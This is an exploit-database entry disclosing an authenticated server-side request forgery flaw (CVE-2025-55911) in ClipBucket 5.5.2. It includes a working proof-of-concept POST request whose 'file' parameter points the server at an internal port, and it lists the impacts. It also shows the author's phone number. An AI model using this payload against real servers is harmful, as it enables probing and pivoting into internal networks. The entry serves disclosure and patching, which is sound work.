ClipBucket 5.5.2 Build #90 - Server-Side Request Forgery (SSRF)

Author: Mukundsinh Solanki (r00td3str0y3r)
type: remote
platform: multiple
port: 
date_added: 2025-09-16  
date_updated: 2025-09-16  
verified: 0  
codes: CVE-2025-55911  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 52434.txt  

# Exploit Title: ClipBucket 5.5.2 Build #90 - Server-Side Request Forgery (SSRF)
# Google Dork: N/A
# Date: 2025-09-11
# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
# Vendor Homepage: https://clipbucket.com
# Software Link: https://github.com/MacWarrior/clipbucket-v5
# Version: 5.5.2 Build #90
# Tested on: Ubuntu 20.04 LTS, PHP 7.4
# CVE: CVE-2025-55911

## Vulnerability Description:
An authenticated user with regular permissions can exploit a Server-Side
Request Forgery (SSRF) vulnerability via the `file` parameter in
`actions/file_downloader.php`. By supplying a crafted URL, attackers can
force the server to make arbitrary HTTP requests to internal services or
external systems. This can lead to internal network enumeration, data
exfiltration, or pivoting attacks.

## PoC Request:

POST /upload/actions/file_downloader.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=validsession

file=http://127.0.0.1:3306/test.mp4




The server attempts to connect to the internal service (`127.0.0.1:3306`),
demonstrating SSRF.

## Impact:
- Internal service enumeration
- Potential metadata leakage
- Pivoting to internal systems


Regards,
Mukundsinh Solanki
+916355251151